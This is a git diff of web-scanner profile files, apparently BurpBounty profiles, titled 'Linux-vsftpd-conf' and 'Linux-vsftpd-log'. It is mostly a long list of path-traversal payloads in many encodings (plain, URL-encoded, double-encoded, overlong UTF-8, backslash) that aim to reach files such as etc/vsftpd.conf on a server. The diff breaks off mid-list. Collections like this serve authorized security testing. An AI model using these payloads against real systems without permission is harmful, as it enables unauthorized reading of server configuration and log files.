+ "IssueDetail": "Linux-vsftpd-conf",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/vsftpd.conf",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-vsftpd-log.bb b/profiles/Linux-vsftpd-log.bb
index 7896fca..4b596c1 100755
--- a/profiles/Linux-vsftpd-log.bb
+++ b/profiles/Linux-vsftpd-log.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-vsftpd-log","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{